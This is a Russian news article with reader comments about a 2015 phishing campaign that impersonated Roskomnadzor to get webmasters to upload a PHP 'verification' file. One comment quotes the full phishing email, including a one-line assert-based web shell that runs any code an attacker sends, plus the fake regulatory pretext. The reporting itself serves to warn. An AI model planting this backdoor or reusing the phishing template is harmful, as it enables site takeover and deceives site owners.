Рубрика развивается при поддержке
Advertisement

Администраторы сайтов пожаловались на фишинговую атаку от имени Роскомнадзора Статьи редакции

Неизвестные хакеры от имени Роскомнадзора разослали веб-мастерам по несколько писем, якобы сообщая о внесении в реестр и требуя проделать несложные технические изменения в сайтах, которые на самом деле давали бы им доступ к файловой системе. Об этом в ночь на 27 августа пожаловалось сразу несколько пользователей «Хабрахабра».

По словам Павла Губарева, владельца одного из подвергнувшихся атаке сайтов, поздно вечером 26 августа он получил письмо с адреса zapret-info@roskomnadzor.ru. В нём сообщалось о внесении его сайта в реестр организаторов распространения информации в стиле, похожем на официальные письма Роскомнадзора.

Однако в отличие от настоящих писем, в этом случае неизвестные потребовали от администратора ресурса дополнительной верификации — разместить файл с определённым содержимым в папке reestr в корневом каталоге сайта. В противном случае ему угрожали внесением в чёрные списки в течение 72 часов.

Как пояснил Губарев, код, который требовал разместить «Роскомнадзор», позволял выполнить на сайте любое предусмотренное PHP действие удалённо. Функция assert запрашивала выполняемый код из переменной roskomnadzor, которую злоумышленники могли формулировать как угодно — например, для отправки файлов сайта на другой сервер, изменения содержимого страниц, встраиванию рекламы.

Ночью 27 августа на получение таких же писем пожаловались несколько других пользователей. Часть из них заявила, что их сайты имеют небольшую популярность, поэтому скорее всего злоумышленники разослали «уведомления» по очень большой базе адресов.

Один из пользователей, leonid239, обратил внимание на домен, с которого приходило письмо. По данным Whois, roskomnadzor.org был зарегистрирован 19 августа 2015 года, и для большей правдоподобности этот адрес перенаправлял на настоящий сайт rkn.gov.ru (в момент проверки TJ сайт-подделка был недоступен).

18 августа уведомление о внесении в реестр запрещённых сайтов получили администраторы русскоязычной «Википедии», после чего в течение почти недели развивалась история вокруг возможной полной блокировки энциклопедии. Вероятно, злоумышленники воспользовались нашумевшей темой в своих целях.

Как предполагают пользователи «Хабрахабра», целью хакеров были те администраторы, кто уже слышал о действиях и полномочиях Роскомнадзора и имеет права на редактирование файловой системы сайта, но при этом недостаточно подкован в программировании. Разместить текстовый файл с определённым кодом в корневом каталоге иногда требуют поисковики для правильной индексации или работы систем аналитики.

Как сообщил TJ пресс-секретарь Роскомнадзора Вадим Ампелонский, ведомство попросит заняться расследованием ситуации правоохранительные органы.

В Роскомнадзор по этому поводу поступают обращения граждан. Имеются признаки мошеннических действий. Поэтому мы готовим официальные обращения в МВД и ФСБ.

Вадим Ампелонский, пресс-секретарь Роскомнадзора

Это не первый случай, когда неизвестные пытались выдавать себя за представителей надзорного ведомства. 21 июля издание The Village сообщило о попадании в реестр запрещённых сайтов, однако в Роскомнадзоре заявили, что полученное журналистами письмо являлось поддельным.

0
10 комментариев
Популярные
По порядку
Написать комментарий...
Удивленный звук

По словам Павла Губарева, владельца одного из подвергнувшихся атаке сайтов...

Павел Губарев - народный губернатор сайта

Ответить
15
Развернуть ветку
Удивленный звук

Наши саппорты сейчас тоже достаточно массово отбиваются и уговаривают клиентов не вестись на провокации.

Самое интересное во всем этом - откуда адреса владельцев доменов столь массово утекли. На устаревшую (до private person по умолчанию) базу Whois - непохоже по размаху, плюс есть реальные кейсы, в которых приватная персона у владельцев включена, но письмо они получили.

Ответить
2
Развернуть ветку
Удивленный звук

А регистраторы разные?

Ответить
0
Развернуть ветку
Удивленный звук

Проверил теорию - да, регистраторы таки разные, приватная персона включена.
Сканирование этого кстати уже активно идет очень, благо на ~500 запросов с кодом 404 (на 1500 тысячи активных сайтов), меньше десятка отдаются с 200 (т.е люди ведутся и размещают)

Ответить
1
Развернуть ветку
Удивленный звук

пока не получил подтверждения этого, если честно.
у меня RU-шный регистратор один, поэтому не могу сказать, нужно с коллегами пообщаться.

Ответить
0
Развернуть ветку
Удивленный звук

Вообще, конечно, надеюсь, что владельцы достаточно грамотны, чтобы не размещать такие очевидно печальные файлы у себя)

Ответить
1
Развернуть ветку
Удивленный звук

Скопирую с хабрахабра:

Гугл, яндекс, некоторые другие сервисы приучили владельцев сайта создавать в корне файл и вписывать туда какую-нибудь строчку для верификации. Поэтому знания и навыки для выполнения этой задачи несколько ниже, чем может показаться и сама просьба положить что-то для верификации выглядит натурально. Кроме того, многие фирмы по скупке ссылок, а так же тот же вирусдай который тут на хабре пиарился, да и некоторые биржи ссылок, уже просят разместить php файл в корне. Тут получается что мало того, что знания и навыки уже есть, но и просьба разместить php код выглядит достаточно естественно. Про роскомнадзор каждый неленивый слышал, так что испуг приглушит возможные подозрения до кучи.
Под таким углом задача выглядит не сложнее чем зайти в вордпресс и разместить какую-нибудь новость… и не опаснее.

Ответить
2
Развернуть ветку
Удивленный звук

Владельцы абсолютного большинства сайтов в рунете - абсолютно неграмотны, чтобы подобное вполне себе разместить.

Ответить
1
Развернуть ветку
Удивленный звук

Мы тоже получили. Мило. :-)

Ответить
0
Развернуть ветку
Удивленный звук

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени kudago.com в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт kudago.com был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени kudago.com, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени kudago.com*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: kudago.com/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени kudago.com, следую инструкции указанной выше, то Ваш сайт kudago.com будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

Ответить
0
Развернуть ветку
Читать все 10 комментариев
null